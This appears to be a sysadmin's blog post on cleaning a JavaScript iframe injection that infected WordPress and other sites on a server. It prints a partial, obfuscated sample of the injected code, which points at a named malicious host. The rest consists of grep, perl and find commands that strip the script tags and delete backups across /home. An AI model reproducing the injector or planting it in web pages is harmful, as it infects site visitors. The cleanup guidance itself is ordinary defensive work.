Lately so many servers has been attacked and injected by malware as IFRAME or code  most of websites infected were blogs( WordPress) which lead to infect all websites on the server

Last 2 days I’ve a fight and I got a cool way and steps to clean all servers files Without worry of deleting your old files Lets start

Assuming your infected with such a code

[js]

var usikwseoomg = ‘PaBUTyjaZYg3cPaBUTyjaZYg69PaBUTyjaZYg66’;

var nimbchnzujc = ‘PaBUTyjaZYg72’;

var szwtgmqzekr = ‘PaBUTyjaZYg61PaBUTyjaZYg6dPaBUTyjaZYg65PaBUTyjaZYg20PaBUTyjaZYg6ePaBUTyjaZYg61PaBUTyjaZYg6dPaBUTyjaZYg65PaBUTyjaZYg3dPaBUTyjaZYg22’;

var yvofadunjkv = ‘PaBUTyjaZYg6dPaBUTyjaZYg67PaBUTyjaZYg79PaBUTyjaZYg65PaBUTyjaZYg64PaBUTyjaZYg61PaBUTyjaZYg67PaBUTyjaZYg70PaBUTyjaZYg7aPaBUTyjaZYg63PaBUTyjaZYg76’;

var ylydzxyjaci = ‘PaBUTyjaZYg22PaBUTyjaZYg20PaBUTyjaZYg77PaBUTyjaZYg69PaBUTyjaZYg64PaBUTyjaZYg74PaBUTyjaZYg68PaBUTyjaZYg3dPaBUTyjaZYg22PaBUTyjaZYg31PaBUTyjaZYg22PaBUTyjaZYg20PaBUTyjaZYg68PaBUTyjaZYg65PaBUTyjaZYg69PaBUTyjaZYg67PaBUTyjaZYg68PaBUTyjaZYg74PaBUTyjaZYg3dPaBUTyjaZYg22PaBUTyjaZYg30PaBUTyjaZYg22’;

var xwojmnoxfbs = ‘PaBUTyjaZYg20PaBUTyjaZYg73PaBUTyjaZYg72PaBUTyjaZYg63PaBUTyjaZYg3dPaBUTyjaZYg22’;

var mgsybgilcfx = ‘PaBUTyjaZYg68PaBUTyjaZYg74PaBUTyjaZYg74PaBUTyjaZYg70PaBUTyjaZYg3aPaBUTyjaZYg2fPaBUTyjaZYg2f’;

var nixyhgyjouf = ‘koska.sytes.net/phl/logs/index.php’;

var nesrtqwuirb = (yydszqnduko.toString().replace(/PaBUTyjaZYg/g, ‘%’)));

[/js]

1st thing to do is to know which files type are infected in your server , so you have to do a global search in /home/ using grep with part of the code which is going to be the domain name “koska.sytes.net

Need a root access ,
Disable FTP Service

[bash]grep -R "koska.sytes.net" /home/ >/root/moe/all.txt[/bash]

we will save all output in that file , all.txt

Result was php,html,htm these files extension was the target

now we have to start clean up the code , we need to delete these lines from all files and keep a copy of all files just to make sure we did it right we are going to use a small complex command

[bash]find /home/ -type f -name ‘*html*’ | xargs perl -e "s/
<script.*PaBUTyjaZYg.*script>//g;" -pi.save

[/bash]

1st part to find all files on /home dir with extension html , then we have to use xargs to execute perl command which delete line start with <script and end with script> AND content *PaBUTyjaZYg.* AND make a backup from the infected files end it with .save

PS : there is a limit to the number of arguments allowed on a single command line that why we use  xargs to build  this command and also we have a huge amount of files to perform search and clean

now we have to re-do the same command and change the extension to php then htm , and so on , till we finish all extension we need to clean up , once we are done we have to  delete the *.save  backup files

using the following command

[bash]find /home/  -type f -name "*.save" -exec rm -f {} \;[/bash]

then we  have to perform the 1st command :) search one  to make sure we all clean and clear

[bash]grep -R "koska.sytes.net" /home/ &gt;/root/moe/cleanr.txt[/bash]

We should get an empty file :)

LAST thing, don’t start ftp services and upload files again till you scan your computer , you’re the source of the problem and malware will use the ftp access again to inject your files if your computer still infected